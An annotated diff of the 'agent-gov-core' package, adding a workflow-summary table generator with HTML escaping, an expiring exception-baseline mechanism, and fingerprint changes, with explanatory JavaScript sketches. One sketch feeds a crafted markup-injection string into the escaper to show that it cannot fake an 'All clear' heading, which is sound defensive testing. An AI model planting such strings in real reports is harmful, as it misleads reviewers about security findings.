+ `${counts.critical} critical, ${counts.high} high, ` +
125
+ `${counts.medium} medium, ${counts.low} low`);
126
+ lines.push('');
127
+ const severityOrder = ['critical', 'high', 'medium', 'low'];
128
+ for (const severity of severityOrder) {
129
+ const group = groups[severity];
130
+ if (group.length === 0)
131
+ continue;
132
+ const shown = group.slice(0, perGroupLimit);
133
+ const overflow = group.length - shown.length;
134
+ lines.push(`<details${severity === 'critical' || severity === 'high' ? ' open' : ''}>`);
135
+ lines.push(`<summary><strong>${group.length} ${severity}</strong></summary>`);
136
+ lines.push('');
137
+ lines.push('| File | Line | Kind | Message |');
138
+ lines.push('|------|------|------|---------|');
139
+ for (const f of shown) {
140
+ lines.push('| ' +
141
+ [
142
+ escapeMarkdownTableCell(f.location?.file ?? '—'),
143
+ f.location?.line ?? '—',
144
+ escapeMarkdownTableCell(f.kind),
145
+ escapeMarkdownTableCell(truncate(f.message, messageMax)),
146
+ ].join(' | ') +
147
+ ' |');
148
+ }
149
+ if (overflow > 0) {
150
+ lines.push(`| _(+${overflow} more ${severity} finding${overflow === 1 ? '' : 's'})_ | | | |`);
151
+ }
152
+ lines.push('');
153
+ lines.push('</details>');
154
+ lines.push('');
155
+ }
156
+ return lines.join('\n');
157
+ }
158
+ function truncate(s, max) {
159
+ if (s.length <= max)
160
+ return s;
161
+ return s.slice(0, Math.max(1, max - 1)) + '…';
162
+ }
163
+ function escapeMarkdownTableCell(s) {
164
+ // Escape HTML control characters so a finding message containing
165
+ // `</summary>` or `<h1>` can't break out of the `<details>` block we
166
+ // emit around each severity group. GitHub sanitizes script execution,
167
+ // but unescaped tags still let an attacker manipulate the visual layout
168
+ // of the workflow summary (collapse other groups, inject misleading
169
+ // headings, etc.).
170
+ return String(s)
171
+ .replace(/&/g, '&amp;')
172
+ .replace(/</g, '&lt;')
173
+ .replace(/>/g, '&gt;')
174
+ .replace(/\|/g, '\\|')
175
+ .replace(/\r?\n/g, ' ');
176
+ }
79
177
  //# sourceMappingURL=action.js.map
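Two private helpers at the end of `action.js` decide what a finding message looks like once it lands in a table cell of the workflow summary. They are not exported, so the sketch below re-declares copies of them locally instead of importing them. It then runs a made-up hostile message through them to show three things:

- the `</summary>` and `<h1>` tags arrive as inert entities;
- the pipe no longer opens a new column;
- the newline no longer ends the row.

```javascript
// Local copies of the private helpers at the end of action.js. They are not
// exported, so this sketch re-declares them instead of importing them.
function truncate(s, max) {
  if (s.length <= max) return s;
  // Keep max - 1 characters and append a one-character ellipsis.
  return s.slice(0, Math.max(1, max - 1)) + '…';
}

function escapeMarkdownTableCell(s) {
  return String(s)
    .replace(/&/g, '&amp;') // first, so the entities added below are not re-escaped
    .replace(/</g, '&lt;') // neutralize tags such as </summary> or <h1>
    .replace(/>/g, '&gt;')
    .replace(/\|/g, '\\|') // a bare pipe would open a new table column
    .replace(/\r?\n/g, ' '); // a newline would end the table row early
}

// Made-up hostile message that tries to close the <details> block and
// inject a heading plus an extra column and row.
const hostile = 'bad</summary></details><h1>All clear</h1> | x\nnext';
const cell = escapeMarkdownTableCell(truncate(hostile, 200));
console.log(cell);
// bad&lt;/summary&gt;&lt;/details&gt;&lt;h1&gt;All clear&lt;/h1&gt; \| x next

console.log(truncate('abcdef', 4)); // abc…
```

Order matters in two places:

- `&` is escaped first, so an entity already present in a message (for example `&lt;`) is shown literally as `&amp;lt;` rather than rendered.
- Truncation runs before escaping, so an escaped cell can exceed `messageMaxLength` by the length of the added entities.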
@@ -0,0 +1,83 @@
1
+ /**
2
+ * Exception baselines — the "we know about this, suppress it for now" mechanism
3
+ * that PolicyMesh (`.policymesh-exceptions.json`) and TaskBound (`.taskbound.yml`
4
+ * `ignore_kinds` / `allow_paths`) both invented separately. Lifted into the
5
+ * substrate so all five tools share one shape and one expiry contract.
6
+ *
7
+ * Two design choices worth flagging:
8
+ *
9
+ * 1. Expired exceptions DON'T silently drop. They re-surface the original
10
+ * finding with severity downgraded to `'low'` and an `[EXPIRED WHITELIST]`
11
+ * prefix on the message. The point of exception baselines is to make stale
12
+ * suppression visible, not to grow a graveyard of permanent ignores.
13
+ *
14
+ * 2. Match keys are `kind` (required) plus optional `salientKey` and
15
+ * `pathPrefix` narrowing. Subject/path matching from the two consumers
16
+ * maps cleanly: PolicyMesh's `subject` is now `salientKey`; TaskBound's
17
+ * `allow_paths` entries map to `pathPrefix` exceptions on the relevant
18
+ * finding kind.
19
+ */
20
+ import type { Finding } from './finding.js';
21
+ /**
22
+ * A single exception rule. Suppresses (or downgrades, when expired) findings
23
+ * whose `kind` matches and — if either narrower is set — whose `salientKey`
24
+ * or `location.file` prefix also matches.
25
+ */
26
+ export interface Exception {
27
+ /** Required: exact match against `Finding.kind`. */
28
+ kind: string;
29
+ /**
30
+ * Optional: exact match against `Finding.salientKey`. Use this to scope an
31
+ * exception to one specific finding instance at a site that produces
32
+ * multiple distinct findings (e.g. one of several suspicious packages on
33
+ * the same import line).
34
+ */
35
+ salientKey?: string;
36
+ /**
37
+ * Optional: only match findings whose `location.file` starts with this
38
+ * string. Use to scope an exception to a directory subtree without listing
39
+ * every file individually (TaskBound's `allow_paths` use case).
40
+ */
41
+ pathPrefix?: string;
42
+ /**
43
+ * Optional ISO 8601 date (YYYY-MM-DD or full timestamp). When the current
44
+ * date is past `expires`, matched findings re-surface with severity
45
+ * downgraded to `'low'` and an `[EXPIRED WHITELIST]` message prefix.
46
+ */
47
+ expires?: string;
48
+ /** Optional free-text rationale, preserved on expired findings via `data.exceptionReason`. */
49
+ reason?: string;
50
+ }
51
+ export interface ApplyExceptionsResult {
52
+ /** Findings after exceptions applied: survivors + downgraded expired entries. */
53
+ findings: Finding[];
54
+ /** Count of findings suppressed by an active (non-expired) exception. */
55
+ suppressed: number;
56
+ /** Count of findings surfaced as expired (downgraded + prefixed). */
57
+ expired: number;
58
+ }
59
+ /**
60
+ * Apply a set of exceptions to a finding list. Returns the post-filter
61
+ * list along with counts so a meta-reviewer can report how many findings
62
+ * the baseline suppressed.
63
+ *
64
+ * @example
65
+ * import { applyExceptions } from 'agent-gov-core';
66
+ *
67
+ * const result = applyExceptions(findings, [
68
+ * { kind: 'capability_echo.high_capability_dep_added', salientKey: 'puppeteer', expires: '2026-06-01', reason: 'browser-tests rollout' },
69
+ * { kind: 'task_bound.out_of_scope_file', pathPrefix: 'tools/internal/', reason: 'internal tooling refactor' },
70
+ * ]);
71
+ * console.log(`${result.suppressed} suppressed, ${result.expired} expired`);
72
+ */
73
+ export declare function applyExceptions(findings: readonly Finding[], exceptions: readonly Exception[], now?: Date): ApplyExceptionsResult;
74
+ /**
75
+ * Validate that an unknown value is a well-formed `Exception` shape. Useful
76
+ * when consumers load exceptions from JSON/YAML and want to surface parse-
77
+ * level errors as findings rather than crash.
78
+ */
79
+ export declare function validateException(value: unknown): {
80
+ ok: boolean;
81
+ errors: string[];
82
+ };
83
+ //# sourceMappingURL=exceptions.d.ts.map
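The `Exception` interface above describes its narrowers. Two matching details, however, only show up in the implementation in `exceptions.js`:

- the first exception in the list that matches wins;
- `pathPrefix` is a plain `startsWith` check, not a directory match.

The sketch below mirrors that private matching loop locally. It is a copy for illustration, not a package export, and it is exercised on hypothetical findings.

```javascript
// Local mirror of the private findMatchingException() in exceptions.js:
// return the FIRST exception whose kind matches and whose optional
// narrowers (salientKey, pathPrefix) also pass.
function findMatchingException(finding, exceptions) {
  for (const exc of exceptions) {
    if (exc.kind !== finding.kind) continue;
    if (exc.salientKey !== undefined && exc.salientKey !== finding.salientKey) continue;
    if (exc.pathPrefix !== undefined) {
      const file = finding.location?.file;
      // Plain string prefix test, not a path-segment comparison.
      if (!file || !file.startsWith(exc.pathPrefix)) continue;
    }
    return exc;
  }
  return undefined;
}

const kind = 'task_bound.out_of_scope_file';
const exceptions = [{ kind, pathPrefix: 'tools/internal', reason: 'no trailing slash' }];

// Hypothetical findings.
const inside = { kind, location: { file: 'tools/internal/gen.ts' } };
const sibling = { kind, location: { file: 'tools/internal-legacy/old.ts' } };
const noFile = { kind };

console.log(Boolean(findMatchingException(inside, exceptions))); // true
console.log(Boolean(findMatchingException(sibling, exceptions))); // true (prefix, not directory)
console.log(Boolean(findMatchingException(noFile, exceptions))); // false (no file to test)

// Order matters: a broad, non-expiring entry listed first shadows a
// narrower, already-expired one, so the finding stays silently suppressed.
const depKind = 'capability_echo.high_capability_dep_added';
const ordered = [
  { kind: depKind, reason: 'broad, never expires' },
  { kind: depKind, salientKey: 'puppeteer', expires: '2020-01-01', reason: 'narrow, expired' },
];
const dep = { kind: depKind, salientKey: 'puppeteer' };
console.log(findMatchingException(dep, ordered).reason); // broad, never expires
```

In practice this has two consequences:

- A `pathPrefix` meant to cover exactly one directory should end in `/`.
- A broad exception with no `expires` that is listed before a narrower one will keep the narrower entry from ever re-surfacing its finding.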
@@ -0,0 +1,129 @@
1
+ /**
2
+ * Exception baselines — the "we know about this, suppress it for now" mechanism
3
+ * that PolicyMesh (`.policymesh-exceptions.json`) and TaskBound (`.taskbound.yml`
4
+ * `ignore_kinds` / `allow_paths`) both invented separately. Lifted into the
5
+ * substrate so all five tools share one shape and one expiry contract.
6
+ *
7
+ * Two design choices worth flagging:
8
+ *
9
+ * 1. Expired exceptions DON'T silently drop. They re-surface the original
10
+ * finding with severity downgraded to `'low'` and an `[EXPIRED WHITELIST]`
11
+ * prefix on the message. The point of exception baselines is to make stale
12
+ * suppression visible, not to grow a graveyard of permanent ignores.
13
+ *
14
+ * 2. Match keys are `kind` (required) plus optional `salientKey` and
15
+ * `pathPrefix` narrowing. Subject/path matching from the two consumers
16
+ * maps cleanly: PolicyMesh's `subject` is now `salientKey`; TaskBound's
17
+ * `allow_paths` entries map to `pathPrefix` exceptions on the relevant
18
+ * finding kind.
19
+ */
20
+ const EXPIRED_PREFIX = '[EXPIRED WHITELIST] ';
21
+ const EXPIRED_DOWNGRADE = 'low';
22
+ /**
23
+ * Apply a set of exceptions to a finding list. Returns the post-filter
24
+ * list along with counts so a meta-reviewer can report how many findings
25
+ * the baseline suppressed.
26
+ *
27
+ * @example
28
+ * import { applyExceptions } from 'agent-gov-core';
29
+ *
30
+ * const result = applyExceptions(findings, [
31
+ * { kind: 'capability_echo.high_capability_dep_added', salientKey: 'puppeteer', expires: '2026-06-01', reason: 'browser-tests rollout' },
32
+ * { kind: 'task_bound.out_of_scope_file', pathPrefix: 'tools/internal/', reason: 'internal tooling refactor' },
33
+ * ]);
34
+ * console.log(`${result.suppressed} suppressed, ${result.expired} expired`);
35
+ */
36
+ export function applyExceptions(findings, exceptions, now = new Date()) {
37
+ if (exceptions.length === 0) {
38
+ return { findings: [...findings], suppressed: 0, expired: 0 };
39
+ }
40
+ const result = [];
41
+ let suppressed = 0;
42
+ let expired = 0;
43
+ for (const finding of findings) {
44
+ const match = findMatchingException(finding, exceptions);
45
+ if (!match) {
46
+ result.push(finding);
47
+ continue;
48
+ }
49
+ if (match.expires && isExpired(match.expires, now)) {
50
+ result.push(downgradeExpired(finding, match));
51
+ expired++;
52
+ }
53
+ else {
54
+ suppressed++;
55
+ }
56
+ }
57
+ return { findings: result, suppressed, expired };
58
+ }
59
+ function findMatchingException(finding, exceptions) {
60
+ for (const exc of exceptions) {
61
+ if (exc.kind !== finding.kind)
62
+ continue;
63
+ if (exc.salientKey !== undefined && exc.salientKey !== finding.salientKey)
64
+ continue;
65
+ if (exc.pathPrefix !== undefined) {
66
+ const file = finding.location?.file;
67
+ if (!file || !file.startsWith(exc.pathPrefix))
68
+ continue;
69
+ }
70
+ return exc;
71
+ }
72
+ return undefined;
73
+ }
74
+ function isExpired(expires, now) {
75
+ const parsed = new Date(expires);
76
+ if (Number.isNaN(parsed.getTime()))
77
+ return false;
78
+ return parsed.getTime() < now.getTime();
79
+ }
80
+ function downgradeExpired(finding, exc) {
81
+ const downgraded = {
82
+ ...finding,
83
+ severity: EXPIRED_DOWNGRADE,
84
+ message: EXPIRED_PREFIX + finding.message,
85
+ };
86
+ if (exc.reason !== undefined) {
87
+ downgraded.data = { ...(finding.data ?? {}), exceptionReason: exc.reason };
88
+ }
89
+ return downgraded;
90
+ }
91
+ /**
92
+ * Validate that an unknown value is a well-formed `Exception` shape. Useful
93
+ * when consumers load exceptions from JSON/YAML and want to surface parse-
94
+ * level errors as findings rather than crash.
95
+ */
96
+ export function validateException(value) {
97
+ const errors = [];
98
+ if (value === null || typeof value !== 'object' || Array.isArray(value)) {
99
+ return { ok: false, errors: ['exception must be a plain object'] };
100
+ }
101
+ const v = value;
102
+ if (typeof v.kind !== 'string' || v.kind.length === 0) {
103
+ errors.push('kind must be a non-empty string');
104
+ }
105
+ if (v.salientKey !== undefined && typeof v.salientKey !== 'string') {
106
+ errors.push('salientKey must be a string when present');
107
+ }
108
+ if (v.pathPrefix !== undefined && typeof v.pathPrefix !== 'string') {
109
+ errors.push('pathPrefix must be a string when present');
110
+ }
111
+ if (v.expires !== undefined) {
112
+ if (typeof v.expires !== 'string') {
113
+ errors.push('expires must be an ISO 8601 string when present');
114
+ }
115
+ else if (Number.isNaN(new Date(v.expires).getTime())) {
116
+ errors.push('expires must be a parseable date (e.g. "2026-12-31" or full ISO timestamp)');
117
+ }
118
+ }
119
+ if (v.reason !== undefined && typeof v.reason !== 'string') {
120
+ errors.push('reason must be a string when present');
121
+ }
122
+ const allowed = new Set(['kind', 'salientKey', 'pathPrefix', 'expires', 'reason']);
123
+ for (const key of Object.keys(v)) {
124
+ if (!allowed.has(key))
125
+ errors.push(`unknown property: ${key}`);
126
+ }
127
+ return { ok: errors.length === 0, errors };
128
+ }
129
+ //# sourceMappingURL=exceptions.js.map
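The `expires` check above leans on the built-in `Date` parser, which has two consequences worth seeing concretely:

- A date-only string such as `'2026-06-01'` is parsed as UTC midnight, so the exception lapses at the start of that UTC day, not at its end.
- A string that does not parse at all is treated as never expiring, which is why `validateException` rejects it up front.

The sketch below copies the private `isExpired` helper and checks both cases. The timestamps and the `'TBD'` value are illustrative.

```javascript
// Local copy of the private isExpired() helper in exceptions.js.
function isExpired(expires, now) {
  const parsed = new Date(expires);
  // Unparseable input counts as "not expired", so the exception keeps
  // suppressing; validateException() is what flags such values.
  if (Number.isNaN(parsed.getTime())) return false;
  return parsed.getTime() < now.getTime();
}

// Date-only ISO strings are read as UTC midnight, so '2026-06-01'
// lapses at the very start of that UTC day.
const justBefore = new Date('2026-05-31T23:59:59Z');
const justAfter = new Date('2026-06-01T00:00:01Z');

console.log(isExpired('2026-06-01', justBefore)); // false
console.log(isExpired('2026-06-01', justAfter)); // true
console.log(isExpired('TBD', justAfter)); // false: never lapses
```

A full timestamp without a UTC offset (for example `'2026-06-01T09:00:00'`) is read as local time instead. Its effective expiry therefore depends on the time zone of the machine running the check.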
package/dist/finding.js CHANGED
@@ -100,11 +100,14 @@ export function fingerprintFinding(finding) {
100
100
  fileNormalized,
101
101
  finding.location?.line ?? '',
102
102
  finding.location?.column ?? '',
103
- // salientKey lets multiple distinct findings at the same (kind, file, line)
104
- // site keep separate fingerprints. Empty string when absent so the hash
105
- // shape is stable across findings that don't need a discriminator.
106
- finding.salientKey ?? '',
107
103
  ];
104
+ // salientKey is appended ONLY when present. Appending `?? ''` would add a
105
+ // trailing pipe even for findings without salientKey, breaking the v0.4.2
106
+ // hash. This way pre-0.4.3 fingerprints stay stable for findings that
107
+ // never set salientKey, while new findings with one stay distinct.
108
+ if (finding.salientKey !== undefined) {
109
+ parts.push(finding.salientKey);
110
+ }
108
111
  return createHash('sha256').update(parts.join('|')).digest('hex').slice(0, 16);
109
112
  }
110
113
  const FINDING_ALLOWED_KEYS = new Set([
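The `fingerprintFinding` change is easiest to see on the string that gets hashed. The sketch below compares the 0.4.3 behavior (always append `salientKey ?? ''`) with the 0.7.0 behavior (append only when present). `fingerprintKey` is a hypothetical name, and the parts list is simplified because only the tail of the real array is visible in this hunk:

- `kind` as the leading element is an assumption;
- the raw `location.file` stands in for `fileNormalized`;
- the sha256 step is left out, so the example needs no imports.

```javascript
// Hypothetical, simplified stand-in for fingerprintFinding(). ASSUMPTIONS:
// `kind` leads the parts array, the raw file path replaces fileNormalized,
// and the sha256 step is skipped; only the pre-hash string is compared.
function fingerprintKey(finding, { appendEmptySalientKey }) {
  const parts = [
    finding.kind,
    finding.location?.file ?? '',
    finding.location?.line ?? '',
    finding.location?.column ?? '',
  ];
  if (appendEmptySalientKey) {
    parts.push(finding.salientKey ?? ''); // 0.4.3: always appended
  } else if (finding.salientKey !== undefined) {
    parts.push(finding.salientKey); // 0.7.0: appended only when present
  }
  return parts.join('|');
}

const kind = 'capability_echo.high_capability_dep_added';
const plain = { kind, location: { file: 'package.json', line: 3 } };
const keyed = { ...plain, salientKey: 'puppeteer' };

console.log(fingerprintKey(plain, { appendEmptySalientKey: true }));
// capability_echo.high_capability_dep_added|package.json|3||
console.log(fingerprintKey(plain, { appendEmptySalientKey: false }));
// capability_echo.high_capability_dep_added|package.json|3|
console.log(fingerprintKey(keyed, { appendEmptySalientKey: false }));
// capability_echo.high_capability_dep_added|package.json|3||puppeteer
```

Without a `salientKey`, the 0.4.3 string carries one extra trailing `|` and so hashes differently from a key built without the field at all. The 0.7.0 string drops that separator, which is what the source comment relies on to keep pre-`salientKey` fingerprints stable. With a `salientKey`, two findings at the same site still get distinct keys.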
package/dist/index.d.ts CHANGED
@@ -4,10 +4,20 @@ export type { JsonObjectWithSource } from './jsonc.js';
4
4
  export { readJsonObjectWithSource, stripJsonComments } from './jsonc.js';
5
5
  export type { TomlObjectWithSource } from './toml.js';
6
6
  export { readTomlObject, parseToml } from './toml.js';
7
+ export { ConfigParseError, lineColumnOfOffset } from './parse-error.js';
8
+ export type { Report, CreateReportSpec, ReportValidationResult } from './report.js';
9
+ export { REPORT_SCHEMA_VERSION, createReport, maxSeverity, validateReport, } from './report.js';
10
+ export type { MergeOptions, MergeSource, InvalidReport, InvalidFinding, MergedReport, } from './merge.js';
11
+ export { mergeFindings } from './merge.js';
12
+ export type { SecretMatch, MatchSecretOptions } from './secrets.js';
13
+ export { matchSecret, SECRET_PATTERNS } from './secrets.js';
14
+ export type { Exception, ApplyExceptionsResult } from './exceptions.js';
15
+ export { applyExceptions, validateException } from './exceptions.js';
7
16
  export type { ByteRange } from './locators.js';
8
17
  export { lineOfJsonKey, lineOfJsonStringValue, lineOfTomlKey, } from './locators.js';
9
18
  export type { McpCommandSpec } from './mcp.js';
10
19
  export { normalizeMcpCommand } from './mcp.js';
11
- export { tokenizeShell, getCommandHead } from './shell.js';
12
- export { rankSeverity, passesSeverityThreshold, anyAtOrAbove, emitFindingAnnotation, } from './action.js';
20
+ export { tokenizeShell, tokenizeShellDeep, getCommandHead } from './shell.js';
21
+ export type { WorkflowSummaryOptions } from './action.js';
22
+ export { rankSeverity, passesSeverityThreshold, anyAtOrAbove, emitFindingAnnotation, generateWorkflowSummary, } from './action.js';
13
23
  //# sourceMappingURL=index.d.ts.map
package/dist/index.js CHANGED
@@ -1,8 +1,13 @@
1
1
  export { SEVERITIES, TOOL_KINDS, isSeverity, isToolKind, isNamespacedKind, kind, createFinding, fingerprintFinding, validateFinding, } from './finding.js';
2
2
  export { readJsonObjectWithSource, stripJsonComments } from './jsonc.js';
3
3
  export { readTomlObject, parseToml } from './toml.js';
4
+ export { ConfigParseError, lineColumnOfOffset } from './parse-error.js';
5
+ export { REPORT_SCHEMA_VERSION, createReport, maxSeverity, validateReport, } from './report.js';
6
+ export { mergeFindings } from './merge.js';
7
+ export { matchSecret, SECRET_PATTERNS } from './secrets.js';
8
+ export { applyExceptions, validateException } from './exceptions.js';
4
9
  export { lineOfJsonKey, lineOfJsonStringValue, lineOfTomlKey, } from './locators.js';
5
10
  export { normalizeMcpCommand } from './mcp.js';
6
- export { tokenizeShell, getCommandHead } from './shell.js';
7
- export { rankSeverity, passesSeverityThreshold, anyAtOrAbove, emitFindingAnnotation, } from './action.js';
11
+ export { tokenizeShell, tokenizeShellDeep, getCommandHead } from './shell.js';
12
+ export { rankSeverity, passesSeverityThreshold, anyAtOrAbove, emitFindingAnnotation, generateWorkflowSummary, } from './action.js';
8
13
  //# sourceMappingURL=index.js.map